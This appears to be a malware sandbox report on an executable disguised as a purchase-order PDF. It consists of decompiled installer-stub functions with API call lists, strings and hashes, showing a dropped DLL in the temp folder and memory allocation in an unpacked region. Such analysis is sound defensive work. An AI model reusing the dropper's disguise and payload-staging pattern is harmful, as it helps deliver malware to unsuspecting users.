					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Alvin\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x00403251
0x00000000
0x00000000
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x00403320
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x00403357
0x00403363
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x00403274
0x00000000
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x0040317a
0x0040317c
0x0040317c
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x00403194
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031aa
0x004031d0
0x004031df
0x004031e5
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031fa
0x00403202
0x00403205
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x00000000
0x00000000
0x00000000
0x004031fa
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403241
0x00000000
0x00403241

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO-230821_pdf.exe,00000400), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-230821_pdf.exe,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 00403149
GlobalAlloc.KERNEL32(00000040,?), ref: 0040328B

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 004032A3
Inst, xrefs: 004031B5
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
C:\Users\user\Desktop\PO-230821_pdf.exe, xrefs: 004030EA, 004030F9, 0040310D, 0040312A
soft, xrefs: 004031BE
Error launching installer, xrefs: 00403120
Null, xrefs: 004031C7
C:\Users\user\Desktop, xrefs: 0040312B, 00403130, 00403136

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-230821_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-598113387
Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Fosk";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Alvin\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp", _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp");
						_t64 = E00405CC8("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Fosklcks,Fosklcks,00000000,00000000,Fosklcks,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Strings

C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll, xrefs: 00401835, 00401851
Fosklcks, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll$Fosklcks
API String ID: 1941528284-1804423583
Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 02450DC0 Relevance: 10.7, APIs: 7, Instructions: 194
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,02451656,7FAB7E30), ref: 02450E86
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040), ref: 02450EB0
ReadFile.KERNEL32(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000), ref: 02450EC7
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040), ref: 02450EE9
FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040,?,00000000,0000000E), ref: 02450F5B
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040,?), ref: 02450F66
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,02451656,7FAB7E30,02451314,00000000,00000040,?), ref: 02450FB1

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: ce1a21581a1d3c8f3fac88fdd94d9c6fcb191cccf3e5ae48aa48ce066747a06c
Instruction ID: 8b8ca691fb7a9dbe3aef6a0893c9d8d553b45feead42372121a434550edf58d5
Opcode Fuzzy Hash: ce1a21581a1d3c8f3fac88fdd94d9c6fcb191cccf3e5ae48aa48ce066747a06c
Instruction Fuzzy Hash: FA51AD76E00228BBDB209FB5DC44BAEB7B9AF0C714F10551AFD81F7281D7B499418B64

Uniqueness

Uniqueness Score: -1.00%

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069dc
0x004069e5
0x004069e7
0x004069e7
0x004069eb
0x004069fe
0x004069f8
0x004069f8
0x004069f8
0x00406a17
0x00406a2b
0x00406a32

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
wsprintfW.USER32 ref: 00406A17
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B

Strings

UXTHEME, xrefs: 004069CE
\, xrefs: 004069ED
%s%S.dll, xrefs: 00406A11

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0245020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 02450244

Memory Dump Source

Source File: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2450000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 3e9e2c443f36ccde16643644dd0cb0013996c3119d17eb4d1c870ec734e8282a
Instruction ID: 8363c0826583cce35e2ac3d7b35316ec2b8174665063d0c8e03f1cd285d51578
Opcode Fuzzy Hash: 3e9e2c443f36ccde16643644dd0cb0013996c3119d17eb4d1c870ec734e8282a
Instruction Fuzzy Hash: CE021574D00229EFDF10CF94CD85BADBBB5BF08705F20506AE955BA292D774AA81CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405bdc
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-1098563871
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C
nsa, xrefs: 00406194

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1055269216
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 6.1, APIs: 4, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
